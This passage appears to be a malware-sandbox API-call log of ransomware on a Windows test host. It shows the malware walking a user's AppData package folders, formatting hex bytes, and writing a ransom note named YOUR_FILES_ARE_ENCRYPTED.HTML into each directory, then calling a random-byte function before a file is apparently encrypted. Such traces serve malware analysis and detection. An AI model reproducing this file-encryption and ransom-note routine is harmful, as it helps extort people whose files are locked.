param_1=0x19e0ee, param_2="%02X" | out: param_1="2D") returned 2 [0121.248] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="27") returned 2 [0121.248] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="B1") returned 2 [0121.248] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="E3") returned 2 [0121.248] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="75") returned 2 [0121.248] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="38") returned 2 [0121.248] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="DB") returned 2 [0121.248] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="4B") returned 2 [0121.248] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="8B") returned 2 [0121.248] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="B1") returned 2 [0121.248] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="8B") returned 2 [0121.249] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="02") returned 2 [0121.249] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="E1") returned 2 [0121.249] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="2A") returned 2 [0121.249] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="6D") returned 2 [0121.249] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\settings.dat" [0121.249] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0121.249] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0121.249] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x944bfdaf, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x944bfdaf, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x944bfdaf, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0121.249] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.249] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\settings.dat.LOG1") returned 112 [0121.249] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0121.249] lstrlenW (lpString=".LOG1") returned 5 [0121.249] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0121.249] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x944bfdaf, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x944bfdaf, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x944bfdaf, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0121.249] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.250] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\settings.dat.LOG2") returned 112 [0121.250] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0121.250] lstrlenW (lpString=".LOG2") returned 5 [0121.250] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0121.250] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x944bfdaf, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x944bfdaf, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x944bfdaf, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0121.250] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.250] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0121.250] GetProcessHeap () returned 0x600000 [0121.250] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3151028 [0121.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0121.250] WriteFile (in: hFile=0x320, lpBuffer=0x3151028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3151028*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.251] CloseHandle (hObject=0x320) returned 1 [0121.251] GetProcessHeap () returned 0x600000 [0121.252] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3151028 | out: hHeap=0x600000) returned 1 [0121.252] GetProcessHeap () returned 0x600000 [0121.252] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.252] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e49c81d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e49c81d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0121.252] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.252] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\SystemAppData") returned 99 [0121.252] GetProcessHeap () returned 0x600000 [0121.252] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.252] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\SystemAppData" [0121.252] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\SystemAppData\\*" [0121.252] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e49c81d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e49c81d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.252] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e49c81d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e49c81d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName="..", cAlternateFileName="")) returned 1 [0121.252] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e49c81d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e49c81d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName="..", cAlternateFileName="")) returned 0 [0121.252] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.252] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0121.252] GetProcessHeap () returned 0x600000 [0121.252] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3151028 [0121.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0121.253] WriteFile (in: hFile=0x320, lpBuffer=0x3151028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3151028*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.254] CloseHandle (hObject=0x320) returned 1 [0121.254] GetProcessHeap () returned 0x600000 [0121.254] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3151028 | out: hHeap=0x600000) returned 1 [0121.254] GetProcessHeap () returned 0x600000 [0121.254] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.254] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e49c81d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e49c81d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0121.254] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.254] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\TempState") returned 95 [0121.254] GetProcessHeap () returned 0x600000 [0121.254] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.254] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\TempState" [0121.254] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\TempState\\*" [0121.254] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e49c81d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e49c81d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.254] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e49c81d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e49c81d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName="..", cAlternateFileName="")) returned 1 [0121.254] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e49c81d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e49c81d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName="..", cAlternateFileName="")) returned 0 [0121.254] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.254] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0121.254] GetProcessHeap () returned 0x600000 [0121.255] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3151028 [0121.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0121.255] WriteFile (in: hFile=0x320, lpBuffer=0x3151028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3151028*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.256] CloseHandle (hObject=0x320) returned 1 [0121.256] GetProcessHeap () returned 0x600000 [0121.256] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3151028 | out: hHeap=0x600000) returned 1 [0121.256] GetProcessHeap () returned 0x600000 [0121.256] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.256] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e8c896c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e8c896c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e8c896c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy", cAlternateFileName="WINDOW~1.0_N")) returned 1 [0121.256] StrStrIW (lpFirst="Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.256] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy") returned 151 [0121.256] GetProcessHeap () returned 0x600000 [0121.256] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.256] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy" [0121.256] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\*" [0121.256] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e8c896c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e8c896c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e8c896c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.257] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e8c896c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e8c896c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e8c896c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName="..", cAlternateFileName="")) returned 1 [0121.257] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e8c896c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e8c896c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e8c896c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0121.257] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.257] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore") returned 167 [0121.257] GetProcessHeap () returned 0x600000 [0121.257] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0121.258] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore" [0121.258] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*" [0121.258] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e8c896c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e8c896c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e9d39e1, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318d3f0, dwReserved1=0x9b3ba, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.260] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e8c896c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e8c896c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e9d39e1, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318d3f0, dwReserved1=0x9b3ba, cFileName="..", cAlternateFileName="")) returned 1 [0121.260] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e8c896c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9eca8840, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9eca8840, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x318d3f0, dwReserved1=0x9b3ba, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0121.260] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.260] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat") returned 187 [0121.260] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0121.260] lstrlenW (lpString=".dat") returned 4 [0121.260] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0121.260] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: 